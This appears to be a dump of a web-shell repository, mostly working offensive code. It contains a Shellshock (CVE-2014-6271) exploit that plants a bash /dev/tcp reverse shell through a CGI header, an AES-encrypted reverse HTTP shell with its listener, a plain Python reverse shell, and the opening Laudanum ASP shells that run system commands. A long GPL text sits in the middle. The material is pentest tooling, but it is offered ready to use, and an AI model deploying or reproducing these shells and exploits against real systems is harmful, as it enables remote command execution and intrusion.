├── CVE-2014-6271 └── CVE-2014-6271 cgi-bin reverse shell.py ├── Encrypted Shell ├── server.py ├── shell.exe └── shell.py ├── RevShell_PoC_v1.py ├── laudanum ├── CREDITS ├── GPL ├── README ├── asp │ ├── dns.asp │ ├── file.asp │ ├── proxy.asp │ └── shell.asp ├── aspx │ └── shell.aspx ├── cfm │ └── shell.cfm ├── jsp │ ├── cmd.war │ ├── makewar.sh │ └── warfiles │ │ ├── META-INF │ │ └── MANIFEST.MF │ │ ├── WEB-INF │ │ └── web.xml │ │ └── cmd.jsp ├── php │ ├── dns.php │ ├── file.php │ ├── host.php │ ├── killnc.php │ ├── php-reverse-shell.php │ ├── proxy.php │ └── shell.php └── wordpress │ ├── laudanum.php │ └── templates │ ├── dns.php │ ├── file.php │ ├── host.php │ ├── ipcheck.php │ ├── killnc.php │ ├── php-reverse-shell.php │ ├── proxy.php │ ├── settings.php │ └── shell.php ├── perl-reverse-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PERL-REVERSE-SHELL └── perl-reverse-shell.pl ├── php-findsock-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PHP-FINDSOCK-SHELL ├── findsock.c └── php-findsock-shell.php ├── php-reverse-shell-1.0 ├── CHANGELOG ├── COPYING.GPL ├── COPYING.PHP-REVERSE-SHELL └── php-reverse-shell.php └── simple_py_shell.py /CVE-2014-6271/CVE-2014-6271 cgi-bin reverse shell.py: -------------------------------------------------------------------------------- 1 | # 2 | #CVE-2014-6271 cgi-bin reverse shell 3 | # 4 | 5 | import httplib,urllib,sys 6 | 7 | if (len(sys.argv)<4): 8 | print "Usage: %s " % sys.argv[0] 9 | print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] 10 | exit(0) 11 | 12 | conn = httplib.HTTPConnection(sys.argv[1]) 13 | reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] 14 | 15 | headers = {"Content-type": "application/x-www-form-urlencoded", 16 | "test":reverse_shell } 17 | conn.request("GET",sys.argv[2],headers=headers) 18 | res = conn.getresponse() 19 | print res.status, res.reason 20 | data = res.read() 21 | print data -------------------------------------------------------------------------------- /Encrypted Shell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ############################################ 3 | # 4 | # 5 | # AES Encrypted Reverse HTTP Listener by: 6 | # 7 | # Dave Kennedy (ReL1K) 8 | # http://www.secmaniac.com 9 | # 10 | # 11 | ############################################ 12 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 13 | # 14 | # This piece of software code is licensed under the FreeBSD license.. 15 | # 16 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 17 | 18 | from BaseHTTPServer import BaseHTTPRequestHandler 19 | from BaseHTTPServer import HTTPServer 20 | import urlparse 21 | import re 22 | import os 23 | import base64 24 | from Crypto.Cipher import AES 25 | 26 | # the block size for the cipher object; must be 16, 24, or 32 for AES 27 | BLOCK_SIZE = 32 28 | # the character used for padding--with a block cipher such as AES, the value 29 | # you encrypt must be a multiple of BLOCK_SIZE in length. This character is 30 | # used to ensure that your value is always a multiple of BLOCK_SIZE 31 | PADDING = '{' 32 | # one-liner to sufficiently pad the text to be encrypted 33 | pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING 34 | 35 | # one-liners to encrypt/encode and decrypt/decode a string 36 | # encrypt with AES, encode with base64 37 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) 38 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) 39 | 40 | # 32 character secret key - change this if you want to be unique 41 | secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2" 42 | 43 | # create a cipher object using the random secret 44 | cipher = AES.new(secret) 45 | 46 | # url decode for postbacks 47 | def htc(m): 48 | return chr(int(m.group(1),16)) 49 | 50 | # url decode 51 | def urldecode(url): 52 | rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M) 53 | return rex.sub(htc,url) 54 | 55 | class GetHandler(BaseHTTPRequestHandler): 56 | 57 | # handle get request 58 | def do_GET(self): 59 | 60 | # this will be our shell command 61 | message = raw_input("shell> ") 62 | # send a 200 OK response 63 | self.send_response(200) 64 | # end headers 65 | self.end_headers() 66 | # encrypt the message 67 | message = EncodeAES(cipher, message) 68 | # base64 it 69 | message = base64.b64encode(message) 70 | # write our command shell param to victim 71 | self.wfile.write(message) 72 | # return out 73 | return 74 | 75 | # handle post request 76 | def do_POST(self): 77 | 78 | # send a 200 OK response 79 | self.send_response(200) 80 | # # end headers 81 | self.end_headers() 82 | # grab the length of the POST data 83 | length = int(self.headers.getheader('content-length')) 84 | # read in the length of the POST data 85 | qs = self.rfile.read(length) 86 | # url decode 87 | url=urldecode(qs) 88 | # remove the parameter cmd 89 | url=url.replace("cmd=", "") 90 | # base64 decode 91 | message = base64.b64decode(url) 92 | # decrypt the string 93 | message = DecodeAES(cipher, message) 94 | # display the command back decrypted 95 | print message 96 | 97 | if __name__ == '__main__': 98 | 99 | # bind to all interfaces 100 | server = HTTPServer(('', 80), GetHandler) 101 | print """############################################ 102 | # 103 | # 104 | # AES Encrypted Reverse HTTP Listener by: 105 | # 106 | # Dave Kennedy (ReL1K) 107 | # http://www.secmaniac.com 108 | # 109 | # 110 | ############################################""" 111 | print 'Starting encrypted web shell server, use to stop' 112 | # simple try block 113 | try: 114 | # serve and listen forever 115 | server.serve_forever() 116 | # handle keyboard interrupts 117 | except KeyboardInterrupt: 118 | print "[!] Exiting the encrypted webserver shell.. hack the gibson." 119 | -------------------------------------------------------------------------------- /Encrypted Shell/shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jbarcia/Web-Shells/599cae3d6c134e98d7f7384ba3e88a5114cf4c88/Encrypted Shell/shell.exe -------------------------------------------------------------------------------- /Encrypted Shell/shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ########################################################################################################################## 3 | # 4 | # 5 | # AES Encrypted Reverse HTTP Shell by: 6 | # 7 | # Dave Kennedy (ReL1K) 8 | # http://www.secmaniac.com 9 | # 10 | ########################################################################################################################## 11 | # 12 | ########################################################################################################################## 13 | # 14 | # To compile, you will need pyCrypto, it's a pain to install if you do it from source, should get the binary modules 15 | # to make it easier. Can download from here: 16 | # http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip 17 | # 18 | ########################################################################################################################## 19 | # 20 | # This shell works on any platform you want to compile it in. OSX, Windows, Linux, etc. 21 | # 22 | ########################################################################################################################## 23 | # 24 | ########################################################################################################################## 25 | # 26 | # Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction 27 | # so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary. 28 | # 29 | ########################################################################################################################## 30 | # 31 | # export VERSIONER_PYTHON_PREFER_32_BIT=yes 32 | # python Configure.py 33 | # python Makespec.py --onefile --noconsole shell.py 34 | # python Build.py shell/shell.spec 35 | # 36 | ########################################################################################################################### 37 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 38 | # 39 | # This piece of software code is licensed under the FreeBSD license.. 40 | # 41 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 42 | 43 | import urllib 44 | import urllib2 45 | import httplib 46 | import subprocess 47 | import sys 48 | import base64 49 | import os 50 | from Crypto.Cipher import AES 51 | 52 | 53 | # the block size for the cipher object; must be 16, 24, or 32 for AES 54 | BLOCK_SIZE = 32 55 | # the character used for padding--with a block cipher such as AES, the value 56 | # you encrypt must be a multiple of BLOCK_SIZE in length. This character is 57 | # used to ensure that your value is always a multiple of BLOCK_SIZE 58 | PADDING = '{' 59 | # one-liner to sufficiently pad the text to be encrypted 60 | pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING 61 | 62 | # one-liners to encrypt/encode and decrypt/decode a string 63 | # encrypt with AES, encode with base64 64 | EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) 65 | DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) 66 | 67 | # secret key, change this if you want to be unique 68 | secret = "Fj39@vF4@54&8dE@!)(*^+-pL;'dK3J2" 69 | 70 | # create a cipher object using the random secret 71 | cipher = AES.new(secret) 72 | 73 | # TURN THIS ON IF YOU WANT PROXY SUPPORT 74 | PROXY_SUPPORT = "OFF" 75 | # THIS WILL BE THE PROXY URL 76 | PROXY_URL = "http://proxyinfo:80" 77 | # USERNAME FOR THE PROXY 78 | USERNAME = "username" 79 | # PASSWORD FOR THE PROXY 80 | PASSWORD = "password" 81 | 82 | # here is where we set all of our proxy settings 83 | if PROXY_SUPPORT == "ON": 84 | auth_handler = urllib2.HTTPBasicAuthHandler() 85 | auth_handler.add_password(realm='RESTRICTED ACCESS', 86 | uri=PROXY_URL, # PROXY SPECIFIED ABOVE 87 | user=USERNAME, # USERNAME SPECIFIED ABOVE 88 | passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE 89 | opener = urllib2.build_opener(auth_handler) 90 | urllib2.install_opener(opener) 91 | 92 | try: 93 | # our reverse listener ip address 94 | address = sys.argv[1] 95 | # our reverse listener port address 96 | port = sys.argv[2] 97 | 98 | # except that we didn't pass parameters 99 | except IndexError: 100 | print " \nAES Encrypted Reverse HTTP Shell by:" 101 | print " Dave Kennedy (ReL1K)" 102 | print " http://www.secmaniac.com" 103 | print "Usage: shell.exe " 104 | sys.exit() 105 | 106 | # loop forever 107 | while 1: 108 | 109 | # open up our request handelr 110 | req = urllib2.Request('http://%s:%s' % (address,port)) 111 | # grab our response which contains what command we want 112 | message = urllib2.urlopen(req) 113 | # base64 unencode 114 | message = base64.b64decode(message.read()) 115 | # decrypt the communications 116 | message = DecodeAES(cipher, message) 117 | # quit out if we receive that command 118 | if message == "quit" or message == "exit": 119 | sys.exit() 120 | # issue the shell command we want 121 | proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 122 | # read out the data of stdout 123 | data = proc.stdout.read() + proc.stderr.read() 124 | # encrypt the data 125 | data = EncodeAES(cipher, data) 126 | # base64 encode the data 127 | data = base64.b64encode(data) 128 | # urlencode the data from stdout 129 | data = urllib.urlencode({'cmd': '%s'}) % (data) 130 | # who we want to connect back to with the shell 131 | h = httplib.HTTPConnection('%s:%s' % (address,port)) 132 | # set our basic headers 133 | headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} 134 | # actually post the data 135 | h.request('POST', '/index.aspx', data, headers) 136 | -------------------------------------------------------------------------------- /RevShell_PoC_v1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Simple Reverse Shell Written by: Dave Kennedy (ReL1K) 3 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 4 | # 5 | # This piece of software code is licensed under the FreeBSD license.. 6 | # 7 | # Visit http://www.freebsd.org/copyright/freebsd-license.html for more information. 8 | 9 | import socket 10 | import subprocess 11 | 12 | HOST = '192.168.225.136' # The remote host 13 | PORT = 443 # The same port as used by the server 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((HOST, PORT)) 16 | # loop forever 17 | while 1: 18 | # recv command line param 19 | data = s.recv(1024) 20 | # execute command line 21 | proc = subprocess.Popen(data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 22 | # grab output from commandline 23 | stdout_value = proc.stdout.read() + proc.stderr.read() 24 | # send back to attacker 25 | s.send(stdout_value) 26 | # quit out afterwards and kill socket 27 | s.close() 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /laudanum/CREDITS: -------------------------------------------------------------------------------- 1 | The Team 2 | ======================================================== 3 | - Kevin Johnson 4 | - Project Lead 5 | 6 | - Tim Medin 7 | - Project Lead 8 | 9 | - Justin Searle 10 | - Core Developer 11 | 12 | Additional Coding 13 | ======================================================== 14 | - Robin Wood 15 | - Jason Gillam (Wordpress Plugin) -------------------------------------------------------------------------------- /laudanum/GPL: -------------------------------------------------------------------------------- 1 | The GNU General Public License (GPL) 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc. 5 | 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 6 | 7 | Everyone is permitted to copy and distribute verbatim copies 8 | of this license document, but changing it is not allowed. 9 | 10 | Preamble 11 | 12 | The licenses for most software are designed to take away your freedom to share 13 | and change it. By contrast, the GNU General Public License is intended to 14 | guarantee your freedom to share and change free software--to make sure the 15 | software is free for all its users. This General Public License applies to most 16 | of the Free Software Foundation's software and to any other program whose 17 | authors commit to using it. (Some other Free Software Foundation software is 18 | covered by the GNU Library General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not price. Our 22 | General Public Licenses are designed to make sure that you have the freedom to 23 | distribute copies of free software (and charge for this service if you wish), 24 | that you receive source code or can get it if you want it, that you can change 25 | the software or use pieces of it in new free programs; and that you know you can 26 | do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid anyone to deny 29 | you these rights or to ask you to surrender the rights. These restrictions 30 | translate to certain responsibilities for you if you distribute copies of the 31 | software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether gratis or for 34 | a fee, you must give the recipients all the rights that you have. You must make 35 | sure that they, too, receive or can get the source code. And you must show them 36 | these terms so they know their rights. 37 | 38 | We protect your rights with two steps: (1) copyright the software, and (2) 39 | offer you this license which gives you legal permission to copy, distribute 40 | and/or modify the software. 41 | 42 | Also, for each author's protection and ours, we want to make certain that 43 | everyone understands that there is no warranty for this free software. If the 44 | software is modified by someone else and passed on, we want its recipients to 45 | know that what they have is not the original, so that any problems introduced 46 | by others will not reflect on the original authors' reputations. 47 | 48 | Finally, any free program is threatened constantly by software patents. We wish 49 | to avoid the danger that redistributors of a free program will individually 50 | obtain patent licenses, in effect making the program proprietary. To prevent 51 | this, we have made it clear that any patent must be licensed for everyone's free 52 | use or not licensed at all. 53 | 54 | The precise terms and conditions for copying, distribution and modification 55 | follow. 56 | 57 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 58 | 59 | 0. This License applies to any program or other work which contains a notice 60 | placed by the copyright holder saying it may be distributed under the terms of 61 | this General Public License. The "Program", below, refers to any such program or 62 | work, and a "work based on the Program" means either the Program or any 63 | derivative work under copyright law: that is to say, a work containing the 64 | Program or a portion of it, either verbatim or with modifications and/or 65 | translated into another language. (Hereinafter, translation is included without 66 | limitation in the term "modification".) Each licensee is addressed as "you". 67 | 68 | Activities other than copying, distribution and modification are not covered by 69 | this License; they are outside its scope. The act of running the Program is not 70 | restricted, and the output from the Program is covered only if its contents 71 | constitute a work based on the Program (independent of having been made by 72 | running the Program). Whether that is true depends on what the Program does. 73 | 74 | 1. You may copy and distribute verbatim copies of the Program's source code as 75 | you receive it, in any medium, provided that you conspicuously and appropriately 76 | publish on each copy an appropriate copyright notice and disclaimer of warranty; 77 | keep intact all the notices that refer to this License and to the absence of any 78 | warranty; and give any other recipients of the Program a copy of this License 79 | along with the Program. 80 | 81 | You may charge a fee for the physical act of transferring a copy, and you may at 82 | your option offer warranty protection in exchange for a fee. 83 | 84 | 2. You may modify your copy or copies of the Program or any portion of it, thus 85 | forming a work based on the Program, and copy and distribute such modifications 86 | or work under the terms of Section 1 above, provided that you also meet all of 87 | these conditions: 88 | 89 | a) You must cause the modified files to carry prominent notices stating that 90 | you changed the files and the date of any change. 91 | 92 | b) You must cause any work that you distribute or publish, that in whole or 93 | in part contains or is derived from the Program or any part thereof, to be 94 | licensed as a whole at no charge to all third parties under the terms of 95 | this License. 96 | 97 | c) If the modified program normally reads commands interactively when run, 98 | you must cause it, when started running for such interactive use in the most 99 | ordinary way, to print or display an announcement including an appropriate 100 | copyright notice and a notice that there is no warranty (or else, saying 101 | that you provide a warranty) and that users may redistribute the program 102 | under these conditions, and telling the user how to view a copy of this 103 | License. (Exception: if the Program itself is interactive but does not 104 | normally print such an announcement, your work based on the Program is not 105 | required to print an announcement.) 106 | 107 | These requirements apply to the modified work as a whole. If identifiable 108 | sections of that work are not derived from the Program, and can be reasonably 109 | considered independent and separate works in themselves, then this License, and 110 | its terms, do not apply to those sections when you distribute them as separate 111 | works. But when you distribute the same sections as part of a whole which is a 112 | work based on the Program, the distribution of the whole must be on the terms of 113 | this License, whose permissions for other licensees extend to the entire whole, 114 | and thus to each and every part regardless of who wrote it. 115 | 116 | Thus, it is not the intent of this section to claim rights or contest your 117 | rights to work written entirely by you; rather, the intent is to exercise the 118 | right to control the distribution of derivative or collective works based on the 119 | Program. 120 | 121 | In addition, mere aggregation of another work not based on the Program with the 122 | Program (or with a work based on the Program) on a volume of a storage or 123 | distribution medium does not bring the other work under the scope of this 124 | License. 125 | 126 | 3. You may copy and distribute the Program (or a work based on it, under 127 | Section 2) in object code or executable form under the terms of Sections 1 and 2 128 | above provided that you also do one of the following: 129 | 130 | a) Accompany it with the complete corresponding machine-readable source 131 | code, which must be distributed under the terms of Sections 1 and 2 above on 132 | a medium customarily used for software interchange; or, 133 | 134 | b) Accompany it with a written offer, valid for at least three years, to 135 | give any third party, for a charge no more than your cost of physically 136 | performing source distribution, a complete machine-readable copy of the 137 | corresponding source code, to be distributed under the terms of Sections 1 138 | and 2 above on a medium customarily used for software interchange; or, 139 | 140 | c) Accompany it with the information you received as to the offer to 141 | distribute corresponding source code. (This alternative is allowed only for 142 | noncommercial distribution and only if you received the program in object 143 | code or executable form with such an offer, in accord with Subsection b 144 | above.) 145 | 146 | The source code for a work means the preferred form of the work for making 147 | modifications to it. For an executable work, complete source code means all 148 | the source code for all modules it contains, plus any associated interface 149 | definition files, plus the scripts used to control compilation and installation 150 | of the executable. However, as a special exception, the source code distributed 151 | need not include anything that is normally distributed (in either source or 152 | binary form) with the major components (compiler, kernel, and so on) of the 153 | operating system on which the executable runs, unless that component itself 154 | accompanies the executable. 155 | 156 | If distribution of executable or object code is made by offering access to copy 157 | from a designated place, then offering equivalent access to copy the source code 158 | from the same place counts as distribution of the source code, even though third 159 | parties are not compelled to copy the source along with the object code. 160 | 161 | 4. You may not copy, modify, sublicense, or distribute the Program except as 162 | expressly provided under this License. Any attempt otherwise to copy, modify, 163 | sublicense or distribute the Program is void, and will automatically terminate 164 | your rights under this License. However, parties who have received copies, or 165 | rights, from you under this License will not have their licenses terminated so 166 | long as such parties remain in full compliance. 167 | 168 | 5. You are not required to accept this License, since you have not signed it. 169 | However, nothing else grants you permission to modify or distribute the Program 170 | or its derivative works. These actions are prohibited by law if you do not 171 | accept this License. Therefore, by modifying or distributing the Program (or any 172 | work based on the Program), you indicate your acceptance of this License to do 173 | so, and all its terms and conditions for copying, distributing or modifying the 174 | Program or works based on it. 175 | 176 | 6. Each time you redistribute the Program (or any work based on the Program), 177 | the recipient automatically receives a license from the original licensor to 178 | copy, distribute or modify the Program subject to these terms and conditions. 179 | You may not impose any further restrictions on the recipients' exercise of the 180 | rights granted herein. You are not responsible for enforcing compliance by third 181 | parties to this License. 182 | 183 | 7. If, as a consequence of a court judgment or allegation of patent infringement 184 | or for any other reason (not limited to patent issues), conditions are imposed 185 | on you (whether by court order, agreement or otherwise) that contradict the 186 | conditions of this License, they do not excuse you from the conditions of this 187 | License. If you cannot distribute so as to satisfy simultaneously your 188 | obligations under this License and any other pertinent obligations, then as a 189 | consequence you may not distribute the Program at all. For example, if a patent 190 | license would not permit royalty-free redistribution of the Program by all those 191 | who receive copies directly or indirectly through you, then the only way you 192 | could satisfy both it and this License would be to refrain entirely from 193 | distribution of the Program. 194 | 195 | If any portion of this section is held invalid or unenforceable under any 196 | particular circumstance, the balance of the section is intended to apply and the 197 | section as a whole is intended to apply in other circumstances. 198 | 199 | It is not the purpose of this section to induce you to infringe any patents or 200 | other property right claims or to contest validity of any such claims; this 201 | section has the sole purpose of protecting the integrity of the free software 202 | distribution system, which is implemented by public license practices. Many 203 | people have made generous contributions to the wide range of software 204 | distributed through that system in reliance on consistent application of that 205 | system; it is up to the author/donor to decide if he or she is willing to 206 | distribute software through any other system and a licensee cannot impose that 207 | choice. 208 | 209 | This section is intended to make thoroughly clear what is believed to be a 210 | consequence of the rest of this License. 211 | 212 | 8. If the distribution and/or use of the Program is restricted in certain 213 | countries either by patents or by copyrighted interfaces, the original copyright 214 | holder who places the Program under this License may add an explicit 215 | geographical distribution limitation excluding those countries, so that 216 | distribution is permitted only in or among countries not thus excluded. In such 217 | case, this License incorporates the limitation as if written in the body of 218 | this License. 219 | 220 | 9. The Free Software Foundation may publish revised and/or new versions of the 221 | General Public License from time to time. Such new versions will be similar in 222 | spirit to the present version, but may differ in detail to address new problems 223 | or concerns. 224 | 225 | Each version is given a distinguishing version number. If the Program specifies 226 | a version number of this License which applies to it and "any later version", 227 | you have the option of following the terms and conditions either of that version 228 | or of any later version published by the Free Software Foundation. If the 229 | Program does not specify a version number of this License, you may choose any 230 | version ever published by the Free Software Foundation. 231 | 232 | 10. If you wish to incorporate parts of the Program into other free programs 233 | whose distribution conditions are different, write to the author to ask 234 | for permission. For software which is copyrighted by the Free Software 235 | Foundation, write to the Free Software Foundation; we sometimes make exceptions 236 | for this. Our decision will be guided by the two goals of preserving the free 237 | status of all derivatives of our free software and of promoting the sharing and 238 | reuse of software generally. 239 | 240 | NO WARRANTY 241 | 242 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE 243 | PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED 244 | IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS 245 | IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT 246 | NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 247 | PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE 248 | PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 249 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 250 | 251 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 252 | ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE 253 | PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, 254 | SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY 255 | TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING 256 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF 257 | THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER 258 | PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 259 | -------------------------------------------------------------------------------- /laudanum/README: -------------------------------------------------------------------------------- 1 | Laudanum: Injectable Web Exploit Code v0.8 2 | 3 | By Kevin Johnson 4 | and the Laudanum Development Team 5 | 6 | Project Website: http://laudanum.secureideas.net 7 | Sourceforge Site: http://sourceforge.net/projects/laudanum 8 | 9 | SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum 10 | 11 | ------------------------------------------------------------------------------- 12 | ** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team 13 | ** 14 | ** This program is free software; you can redistribute it and/or modify 15 | ** it under the terms of the GNU General Public License as published by 16 | ** the Free Software Foundation; either version 2 of the License, or 17 | ** (at your option) any later version. 18 | ** 19 | ** This program is distributed in the hope that it will be useful, 20 | ** but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | ** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | ** GNU General Public License for more details. 23 | ** 24 | ** You should have received a copy of the GNU General Public License 25 | ** along with this program; if not, write to the Free Software 26 | ** Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. 27 | ------------------------------------------------------------------------------- 28 | 29 | I. ABOUT 30 | _____________________________________ 31 | Laudanum is a collection of injectable files, designed to be used in a pentest 32 | when upload vulnerabilities, administrative interfaces, and SQL injection flaws 33 | are found. These files are written in multiple languages for different 34 | environments. They provide functionality such as shell, DNS query, LDAP 35 | retrieval and others. 36 | -------------------------------------------------------------------------------- /laudanum/asp/dns.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson 14 | ' *** 15 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** This file provides access to DNS on the system. 20 | ' *** Written by Tim Medin 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | ' ***************** Config entries below *********************** 41 | 42 | ' IPs are enterable as individual addresses TODO: add CIDR support 43 | Dim allowedIPs 44 | Dim allowed 45 | Dim qtypes 46 | Dim qtype 47 | Dim validtype 48 | Dim query 49 | Dim i 50 | Dim command 51 | 52 | allowedIPs = "192.168.0.1,127.0.0.1" 53 | ' Just in cace you added a space in the line above 54 | allowedIPs = replace(allowedIPS," ","") 55 | 'turn it into an array 56 | allowedIPs = split(allowedIPS,",") ' 57 | 58 | ' make sure the ip is allowed 59 | allowed = 0 60 | for i = lbound(allowedIPs) to ubound(allowedIPs) 61 | if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then 62 | allowed = 1 63 | Exit For 64 | end if 65 | next 66 | ' send a 404 if not the allowed IP 67 | if allowed = 0 then 68 | Response.Status = "404 File Not Found" 69 | Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) 70 | Response.End 71 | end if 72 | 73 | %> 74 | 75 | 76 | Laudanum ASP DNS Access 77 | 78 | 79 | 84 | 85 | 86 | 87 |

DNS Query 0.1

88 | <% 89 | 90 | ' dns query types as defined as by windows nslookup 91 | qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",") 92 | qtype = UCase(Request.Form("type")) 93 | 94 | ' see if the query type is valid, if it isn't then set it. 95 | validtype = 0 96 | for i = lbound(qtypes) to ubound(qtypes) 97 | if qtype = qtypes(i) then 98 | validtype = 1 99 | Exit For 100 | end if 101 | next 102 | if validtype = 0 then qtype = "ANY" 103 | 104 | %> 105 |
106 |
107 | DNS Lookup: 108 |

Query: 109 | Type: 121 | 122 |

123 |
124 | <% 125 | 126 | ' get the query 127 | query = trim(Request.Form("query")) 128 | ' the query must be sanitized a bit to try to make sure the shell doesn't hang 129 | query = replace(query, " ", "") 130 | query = replace(query, ";", "") 131 | 132 | if len(query) > 0 then 133 | command = "nslookup -type=" & qtype & " " & query 134 | Set objWShell = Server.CreateObject("WScript.Shell") 135 | Set objCmd = objWShell.Exec(command) 136 | strPResult = objCmd.StdOut.Readall() 137 | set objCmd = nothing: Set objWShell = nothing 138 | %>
<%
139 | 	Response.Write command & "
" 140 | Response.Write replace(strPResult,vbCrLf,"
") 141 | %>
<% 142 | end if 143 | %> 144 |
145 |
146 | Copyright © 2014, Kevin Johnson and the Laudanum team.
147 | Written by Tim Medin.
148 | Get the latest version at laudanum.secureideas.net. 149 |
150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /laudanum/asp/file.asp: -------------------------------------------------------------------------------- 1 | <%@Language="VBScript"%> 2 | <%Option Explicit%> 3 | <%Response.Buffer = True%> 4 | <% 5 | ' ******************************************************************************* 6 | ' *** 7 | ' *** Laudanum Project 8 | ' *** A Collection of Injectable Files used during a Penetration Test 9 | ' *** 10 | ' *** More information is available at: 11 | ' *** http://laudanum.secureideas.net 12 | ' *** laudanum@secureideas.net 13 | ' *** 14 | ' *** Project Leads: 15 | ' *** Kevin Johnson 17 | ' *** 18 | ' *** Copyright 2014 by Kevin Johnson and the Laudanum Team 19 | ' *** 20 | ' ******************************************************************************** 21 | ' *** 22 | ' *** This file provides access to the file system. 23 | ' *** Written by Tim Medin 24 | ' *** 25 | ' ******************************************************************************** 26 | ' *** This program is free software; you can redistribute it and/or 27 | ' *** modify it under the terms of the GNU General Public License 28 | ' *** as published by the Free Software Foundation; either version 2 29 | ' *** of the License, or (at your option) any later version. 30 | ' *** 31 | ' *** This program is distributed in the hope that it will be useful, 32 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | 